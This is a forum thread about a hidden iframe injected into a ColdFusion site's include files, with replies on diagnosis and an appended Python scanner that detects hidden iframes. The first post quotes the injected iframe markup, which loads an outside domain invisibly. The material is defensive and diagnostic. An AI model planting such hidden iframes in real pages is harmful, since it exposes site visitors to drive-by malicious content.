1. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2012

    Iframe Injection Attack in ColdFusion

    Hi, I really need some help!

    Recently one of my sites has been hit with an iframe injection:

    <iframe scrolling="no" frameborder="0" src="the source changes but normally htttp://collegefun4u.com/" width="0" height="1"></iframe>

    It happens at random times and gets inserted in random include files.

    We have clean scanned all computers + server for viruses, changed all FTP/remote desktop passwords but the problem still occurs.

    I don't think that it's an SQL injection attack because it is not hitting the database and only being injected into include files.

    Some advice would really be appreciated as I have tried extensively to get rid of it to no avail!

    I am currently using CF9 running on a Windows 2003 server.

    Thanks a lot!
  2. #2
  3. No Profile Picture

    Join Date
    Jun 2002
    Raleigh, NC
    Assuming you have applied all updates for your JVM, CF 9, Windows, and web server, you can try using this service. It remotely scans your server and identifies security issues with it. It's widely used and reliable. http://hackmycf.com/
    Last edited by kiteless; September 10th, 2012 at 08:45 AM.
  4. #3
  5. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Nov 2004
    You could try changing your files to read-only. If, after changing them to read-only, they continue to be edited, you can likely conclude that the attacker has admin access to your box. If you are not hosting your own server, then you should contact your host and let them know there is a vulnerability.

    I know that doesn't really help you solve the issue, but it can help narrow things down.
    Last edited by rawk; September 11th, 2012 at 12:06 PM.
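
Added example, not part of any post in this thread: a Python scan of a web root for the kind of hidden iframe quoted in the first post, reporting each affected file's modification time and whether it is still writable, so the read-only test from post #3 can be checked after the fact. The extension list, the function names and the sample markup are assumptions constructed for illustration.

```python
import os
import re
from datetime import datetime, timezone

# Assumed extensions; adjust to the include files the site actually uses.
TEMPLATE_EXTS = (".cfm", ".cfc", ".cfml", ".inc", ".html", ".htm")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Constructed sample: a visible iframe followed by an injected 0x1 iframe.
SAMPLE = ('<cfinclude template="header.cfm">\n'
          '<iframe src="/map.cfm" width="400" height="300"></iframe>\n'
          '<iframe scrolling="no" frameborder="0" '
          'src="http://injected.example.invalid/" width="0" height="1"></iframe>\n')

def parse_attrs(tag):
    """Return the tag's attributes as a dict keyed by lower-cased name."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def is_hidden(attrs):
    """True when the iframe is sized or styled so a visitor cannot see it."""
    def tiny(value):
        digits = re.match(r"\s*(\d+)", value or "")
        return bool(digits) and int(digits.group(1)) <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)

def find_hidden_iframes(text):
    """Return (line_number, src) for every hidden iframe in text."""
    return [(text.count("\n", 0, m.start()) + 1, parse_attrs(m.group(0)).get("src", ""))
            for m in IFRAME_RE.finditer(text) if is_hidden(parse_attrs(m.group(0)))]

def scan_tree(root):
    """Report hidden iframes under root with each file's mtime and writability."""
    report = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TEMPLATE_EXTS):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
                report.append({"path": path, "hits": hits, "modified_utc": mtime.isoformat(),
                               "writable": os.access(path, os.W_OK)})
    return report

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE))
```

The `modified_utc` value of each hit can be lined up against web server and FTP logs for the same minute to see which request or login wrote the file.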
